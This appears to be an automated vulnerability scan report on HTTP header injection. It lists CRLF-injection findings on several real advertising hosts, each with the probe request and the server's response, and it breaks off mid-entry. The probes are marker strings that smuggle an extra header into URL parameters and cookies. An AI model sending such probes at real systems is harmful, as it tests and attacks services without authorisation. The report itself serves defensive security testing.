HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cb557%0d%0a32406b19dfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifcb557%0d%0a32406b19dfe?2011.04.27.23.14.45 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifcb557
32406b19dfe:
Date: Wed, 27 Apr 2011 23:15:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [XCLGFbrowser parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d674921/2/717103/decide.php

Issue detail

The value of the XCLGFbrowser request parameter is copied into the Set-cookie response header. The payload 3c28d%0d%0adc0429741c1 was submitted in the XCLGFbrowser parameter. This caused a response containing an injected HTTP header.

Request

GET /adsc/d674921/2/717103/decide.php?XCLGFbrowser=3c28d%0d%0adc0429741c1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3; LP=1303907865

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-cookie: GP=XCLGFbrowser=3c28d
dc0429741c1; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:17:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-.nE'M-0; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 45
Content-Type: text/html

/* a231.dl - Fri Dec 03 11:42:29 EST2010 */
;

2.3. http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d674921/2/717103/decide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-cookie response header. The payload f468c%0d%0a2f69e6bfaeb was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adsc/d674921/2/717103/decide.php?XCLGFbrowser=Cg8JIk24ijttAAA/f468c%0d%0a2f69e6bfaebASDs HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3; LP=1303907865

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:32 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAA/f468c
2f69e6bfaebASDs; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:17:31 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-{nE'M-0; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 45
Content-Type: text/html

/* a210.dl - Fri Dec 03 11:42:29 EST2010 */
;

2.4. http://amch.questionmarket.com/adsc/d884653/4/500005059184/decide.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d884653/4/500005059184/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload e4aa5%0d%0a6fb47c3f680 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d884653/4/500005059184/decide.php?ord=1303946368 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=e4aa5%0d%0a6fb47c3f680

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:21:15 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:21:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1; expires=Sun, 17-Jun-2012 15:21:15 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=e4aa5
6fb47c3f680_884653-jqE'M-0; expires=Sun, 17-Jun-2012 15:21:15 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2.5. http://amch.questionmarket.com/adscgen/sta.php [code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload dc802%0d%0ae91160a4f58 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=884653&site=2397089&code=5059184dc802%0d%0ae91160a4f58&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 23:20:56 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:20:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_884653-1-1; expires=Sun, 17-Jun-2012 15:20:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-QqE'M-0; expires=Sun, 17-Jun-2012 15:20:56 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=884653&site=4-2397089-&code=5059184dc802
e91160a4f58
Content-Length: 33
Content-Type: text/html

/* /adsc/d884653/4/-1/randm.js */

2.6. http://amch.questionmarket.com/adscgen/sta.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 78c5f%0d%0ab88c640c95c was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=884653&site=78c5f%0d%0ab88c640c95c&code=5059184&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 23:20:52 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:20:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_884653-1-1; expires=Sun, 17-Jun-2012 15:20:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-MqE'M-0; expires=Sun, 17-Jun-2012 15:20:52 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=884653&site=-1-78c5f
b88c640c95c-&code=5059184
Content-Length: 44
Content-Type: text/html

/* /adsc/d884653/-1/500005059184/randm.js */

2.7. http://d.xp1.ru4.com/activity [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 3a9b5%0d%0a49214e9d931 was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=3a9b5%0d%0a49214e9d931&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 27 Apr 2011 21:59:57 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://3a9b5
49214e9d931?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

2.8. http://dw.com.com/clear/c.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 94b6b%0d%0a1db13f889e3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/94b6b%0d%0a1db13f889e3?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:38:11 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Set-Cookie: XCLGFbrowser=Cg8JIU24jMM4AAAAGgs; expires=Mon, 26-Apr-2021 21:38:11 GMT; domain=.com.com; path=/
Location: http://dw.com.com/clear/redx/94b6b
1db13f889e3?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.9. http://dw.com.com/clear/redx/c.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/redx/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6be16%0d%0a6954d9b796 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/6be16%0d%0a6954d9b796/c.gif?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:33:03 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.search.com/clear/6be16
6954d9b796/c.gif?ts=1303939983777470&clgf=Cg8JIk24ijttAAAASDs
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.10. http://dw.com.com/clear/redx/c.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/redx/c.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7f0ea%0d%0aecda438f9dd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /clear/redx/7f0ea%0d%0aecda438f9dd?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:33:15 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.search.com/clear/7f0ea
ecda438f9dd?ts=1303939995569160&clgf=Cg8JIk24ijttAAAASDs
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.11. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1cb33%0d%0aa98fe5cd67d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=OTH&si=18181&pi=L&xs=3&pu=http%253A//www.cbsnews.com/%253Fifu%253D&df=1&v=5.5&cb=50841 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; N=2:63136b7f5ed8fe53e6d4a6a9fc75f3cd,ff33ea61b6fcafb8c7a1e9f8316359161cb33%0d%0aa98fe5cd67d; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50212^1^1304141664|50280^1^1304141756|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:10 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Wed, 27 Apr 2011 23:33:10 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sat, 21-Apr-12 23:18:10 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=50212^1^1304141664|50280^1^1304551090|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; path=/; expires=Wed, 04-May-11 23:18:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1303946290^1303948090|18181^1303946290^1303948090; path=/; expires=Wed, 27-Apr-11 23:48:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ff33ea61b6fcafb8c7a1e9f8316359161cb33
a98fe5cd67d,5fe4d0c3901c5337a9498eac0b10cce3; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 242
Content-Type: application/x-javascript
Content-Length: 242

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|
...[SNIP]...

2.12. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

